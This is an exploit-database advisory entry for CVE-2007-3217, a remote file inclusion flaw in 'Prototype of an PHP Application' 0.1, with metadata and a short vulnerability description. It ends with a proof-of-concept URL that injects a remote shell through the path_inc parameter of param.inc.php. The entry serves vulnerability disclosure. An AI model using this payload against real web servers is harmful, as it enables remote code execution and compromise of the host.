Prototype of an PHP Application 0.1 - 'param.inc.php?path_inc' Remote File Inclusion
Author: pito pito
type: webapps
platform: php
port:
date_added: 2007-06-01
date_updated: 2013-12-08
verified: 1
codes: CVE-2007-3217;OSVDB-37158
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comprototypephp-0.1.tar.gz
source: https://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/param/param.inc.php?path_inc=[shell]